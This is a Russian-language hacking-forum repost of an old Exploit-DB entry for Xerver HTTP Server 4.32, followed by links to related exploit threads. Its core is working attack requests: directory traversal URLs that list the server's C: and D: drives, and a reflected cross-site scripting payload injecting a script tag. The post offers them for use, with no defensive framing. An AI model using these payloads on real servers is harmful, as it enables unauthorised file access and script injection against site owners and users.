Exploit Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 315 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 9718

Проверка EDB

Пройдено

Автор: STACK

Тип уязвимости: REMOTE

Платформа: MULTIPLE

CVE: cve-2009-3562 cve-2009-3561

Дата публикации: 2009-09-18

Код:

Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability


By Stack


Directory Traversal Exploit :

http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C

http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:\




XSS Exploit :


http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>

# milw0rm.com [2009-09-18]

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit Xerver HTTP Server 4.32 - Remote Denial of Service

Ответы: 0

Просмотры: 331

Эксплойты & Уязвимости 21 Дек 2022

Exploit Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure

Ответы: 0

Просмотры: 305

Эксплойты & Уязвимости 21 Дек 2022

Exploit Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)

Ответы: 0

Просмотры: 365

Эксплойты & Уязвимости 21 Дек 2022

Exploit Xerver 4.31/4.32 - HTTP Response Splitting

Ответы: 0

Просмотры: 314

Эксплойты & Уязвимости 21 Дек 2022

Exploit Xerver 4.17 Server - URI Null Character Cross-Site Scripting

Ответы: 0

Просмотры: 318

Эксплойты & Уязвимости 21 Дек 2022

Exploit Xerver 4.17 - Single Dot File Request Source Disclosure

Ответы: 0

Просмотры: 330

Эксплойты & Уязвимости 21 Дек 2022

Exploit Xerver 4.17 - Forced Directory Listing

Ответы: 0

Просмотры: 338

Эксплойты & Уязвимости 21 Дек 2022

Exploit Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities

Ответы: 0

Просмотры: 323

Эксплойты & Уязвимости 21 Дек 2022

Exploit Jenkins CLI - HTTP Java Deserialization (Metasploit)

Ответы: 0

Просмотры: 840

Эксплойты & Уязвимости 21 Дек 2022

Exploit Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting

Ответы: 0

Просмотры: 790

Эксплойты & Уязвимости 21 Дек 2022

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.